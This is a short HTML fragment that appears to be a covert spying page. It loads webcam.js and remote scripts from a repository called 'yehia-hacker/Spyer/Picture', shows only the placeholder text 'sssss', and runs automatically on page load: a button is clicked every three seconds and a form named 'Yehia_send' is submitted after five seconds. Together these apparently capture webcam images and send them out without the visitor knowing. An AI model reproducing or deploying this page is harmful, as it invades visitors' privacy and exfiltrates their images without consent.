<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script>

    <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/webcamjs/1.0.24/webcam.js"></script>
<script src='https://raw.githack.com/yehia-hacker/Spyer/master/Picture/javascript.js'>
</script>
<div id='index'>sssss</div>

<script src='https://raw.githack.com/yehia-hacker/Spyer/master/Picture/Runindex.js'></script>

<script language="JavaScript" src='https://raw.githack.com/yehia-hacker/Spyer/master/Picture/Data.js'>

</script>


<script>
for (var counter = 1; counter < 2; counter++) {

window.onload = function(){
    var button = document.getElementById('clicop');
    setInterval(function(){
        button.click();
    },3000); 
};
}</script>
<script>
for (var counter = 1; counter < 2; counter++) {
function explode(){
$(document).ready(function(){
     $("#Yehia_send").submit();
});

}
setTimeout(explode, 5000);

}
</script>